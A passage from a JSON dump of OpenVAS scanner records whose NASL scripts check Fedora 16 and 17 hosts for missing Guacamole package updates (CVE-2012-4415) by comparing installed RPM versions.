script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-14097\");\n script_name(\"Fedora Update for libguac-client-vnc FEDORA-2012-14097\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libguac-client-vnc'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"libguac-client-vnc on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"libguac-client-vnc\", rpm:\"libguac-client-vnc~0.6.0~8.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:51", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-09-27T00:00:00", "id": "OPENVAS:1361412562310864739", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864739", "title": "Fedora Update for libguac-client-rdp FEDORA-2012-14179", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libguac-client-rdp FEDORA-2012-14179\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-September/088214.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864739\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-27 09:04:37 +0530 (Thu, 27 Sep 2012)\");\n script_cve_id(\"CVE-2012-4415\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-14179\");\n script_name(\"Fedora Update for libguac-client-rdp FEDORA-2012-14179\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libguac-client-rdp'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"libguac-client-rdp on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"libguac-client-rdp\", rpm:\"libguac-client-rdp~0.6.1~2.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-02T10:57:43", "bulletinFamily": "scanner", "description": "Check for the Version of guacamole-common", "modified": "2017-12-27T00:00:00", "published": "2012-09-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=864738", "id": "OPENVAS:864738", "title": "Fedora Update for guacamole-common FEDORA-2012-14179", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for guacamole-common FEDORA-2012-14179\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Guacamole is an HTML5 web application that provides access to desktop\n environments using remote desktop protocols such as VNC or RDP. A centralized\n server acts as a tunnel and proxy, allowing access to multiple desktops through\n a web browser. No plugins are needed: the client requires nothing more than a\n web browser supporting HTML5 and AJAX.\n\n guacamole-common is the core Java library used by the Guacamole web application.\n guacamole-common provides abstract means of connecting to guacd, interfacing\n with the JavaScript client and tunnel provided by guacamole-common-js, and\n reading configuration from a standard location (guacamole.properties).\";\n\ntag_affected = \"guacamole-common on Fedora 17\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-September/088216.html\");\n script_id(864738);\n script_version(\"$Revision: 8249 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-27 07:29:56 +0100 (Wed, 27 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-27 09:04:36 +0530 (Thu, 27 Sep 2012)\");\n script_cve_id(\"CVE-2012-4415\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-14179\");\n script_name(\"Fedora Update for guacamole-common FEDORA-2012-14179\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of guacamole-common\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"guacamole-common\", rpm:\"guacamole-common~0.6.1~2.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-03T10:57:43", "bulletinFamily": "scanner", "description": "Check for the Version of guacamole-common-js", "modified": "2018-01-03T00:00:00", "published": "2012-09-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=864741", "id": "OPENVAS:864741", "title": "Fedora Update for guacamole-common-js FEDORA-2012-14179", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for guacamole-common-js FEDORA-2012-14179\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Guacamole is an HTML5 web application that provides access to desktop\n environments using remote desktop protocols such as VNC or RDP. A centralized\n server acts as a tunnel and proxy, allowing access to multiple desktops through\n a web browser. No plugins are needed: the client requires nothing more than a\n web browser supporting HTML5 and AJAX.\n\n guacamole-common-js is the core JavaScript library used by the Guacamole web\n application.\";\n\ntag_affected = \"guacamole-common-js on Fedora 17\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-September/088218.html\");\n script_id(864741);\n script_version(\"$Revision: 8273 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 07:29:19 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-27 09:04:39 +0530 (Thu, 27 Sep 2012)\");\n script_cve_id(\"CVE-2012-4415\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-14179\");\n script_name(\"Fedora Update for guacamole-common-js FEDORA-2012-14179\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of guacamole-common-js\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"guacamole-common-js\", rpm:\"guacamole-common-js~0.6.1~2.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:06", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-09-27T00:00:00", "id": "OPENVAS:1361412562310864735", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864735", "title": "Fedora Update for libguac-client-vnc FEDORA-2012-14179", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libguac-client-vnc FEDORA-2012-14179\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-September/088212.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864735\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-27 09:04:33 +0530 (Thu, 27 Sep 2012)\");\n script_cve_id(\"CVE-2012-4415\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-14179\");\n script_name(\"Fedora Update for libguac-client-vnc FEDORA-2012-14179\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libguac-client-vnc'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"libguac-client-vnc on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"libguac-client-vnc\", rpm:\"libguac-client-vnc~0.6.0~8.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-06T13:07:22", "bulletinFamily": "scanner", "description": "Check for the Version of libguac", "modified": "2018-01-05T00:00:00", "published": "2012-09-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=864746", "id": "OPENVAS:864746", "title": "Fedora Update for libguac FEDORA-2012-14179", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libguac FEDORA-2012-14179\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Guacamole is an HTML5 web application that provides access to desktop\n environments using remote desktop protocols such as VNC or RDP. A centralized\n server acts as a tunnel and proxy, allowing access to multiple desktops through\n a web browser. No plugins are needed: the client requires nothing more than a\n web browser supporting HTML5 and AJAX.\n\n libguac is the core library for guacd (the Guacamole proxy) and any protocol\n support plugins for guacd. libguac provides efficient buffered I/O of text and\n base64 data, as well as somewhat abstracted functions for sending Guacamole\n instructions.\";\n\ntag_affected = \"libguac on Fedora 17\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-September/088213.html\");\n script_id(864746);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-27 09:04:45 +0530 (Thu, 27 Sep 2012)\");\n script_cve_id(\"CVE-2012-4415\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-14179\");\n script_name(\"Fedora Update for libguac FEDORA-2012-14179\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of libguac\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"libguac\", rpm:\"libguac~0.6.3~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-11T11:06:26", "bulletinFamily": "scanner", "description": "Check for the Version of libguac-client-vnc", "modified": "2018-01-09T00:00:00", "published": "2012-09-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=864736", "id": "OPENVAS:864736", "title": "Fedora Update for libguac-client-vnc FEDORA-2012-14097", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libguac-client-vnc FEDORA-2012-14097\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Guacamole is an HTML5 web application that provides access to desktop\n environments using remote desktop protocols such as VNC or RDP. A centralized\n server acts as a tunnel and proxy, allowing access to multiple desktops through\n a web browser. No plugins are needed: the client requires nothing more than a\n web browser supporting HTML5 and AJAX.\n\n libguac-client-vnc is a plugin for guacd which provides support for VNC via the\n libvncclient library (part of libvncserver).\";\n\ntag_affected = \"libguac-client-vnc on Fedora 16\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-September/088268.html\");\n script_id(864736);\n script_version(\"$Revision: 8336 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-09 08:01:48 +0100 (Tue, 09 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-27 09:04:34 +0530 (Thu, 27 Sep 2012)\");\n script_cve_id(\"CVE-2012-4415\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-14097\");\n script_name(\"Fedora Update for libguac-client-vnc FEDORA-2012-14097\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of libguac-client-vnc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"libguac-client-vnc\", rpm:\"libguac-client-vnc~0.6.0~8.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:57:52", "bulletinFamily": "scanner", "description": "Check for the Version of guacamole-common", "modified": "2017-12-27T00:00:00", "published": "2012-09-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=864740", "id": "OPENVAS:864740", "title": "Fedora Update for guacamole-common FEDORA-2012-14097", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for guacamole-common FEDORA-2012-14097\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Guacamole is an HTML5 web application that provides access to desktop\n environments using remote desktop protocols such as VNC or RDP. A centralized\n server acts as a tunnel and proxy, allowing access to multiple desktops through\n a web browser. No plugins are needed: the client requires nothing more than a\n web browser supporting HTML5 and AJAX.\n\n guacamole-common is the core Java library used by the Guacamole web application.\n guacamole-common provides abstract means of connecting to guacd, interfacing\n with the JavaScript client and tunnel provided by guacamole-common-js, and\n reading configuration from a standard location (guacamole.properties).\";\n\ntag_affected = \"guacamole-common on Fedora 16\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-September/088267.html\");\n script_id(864740);\n script_version(\"$Revision: 8249 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-27 07:29:56 +0100 (Wed, 27 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-27 09:04:38 +0530 (Thu, 27 Sep 2012)\");\n script_cve_id(\"CVE-2012-4415\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-14097\");\n script_name(\"Fedora Update for guacamole-common FEDORA-2012-14097\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of guacamole-common\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"guacamole-common\", rpm:\"guacamole-common~0.6.1~2.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:47", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-09-27T00:00:00", "id": "OPENVAS:1361412562310864746", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864746", "title": "Fedora Update for libguac FEDORA-2012-14179", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libguac FEDORA-2012-14179\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-September/088213.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864746\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-27 09:04:45 +0530 (Thu, 27 Sep 2012)\");\n script_cve_id(\"CVE-2012-4415\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-14179\");\n script_name(\"Fedora Update for libguac FEDORA-2012-14179\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libguac'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"libguac on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"libguac\", rpm:\"libguac~0.6.3~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:51", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-09-27T00:00:00", "id": "OPENVAS:1361412562310864748", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864748", "title": "Fedora Update for libguac FEDORA-2012-14097", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libguac FEDORA-2012-14097\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright 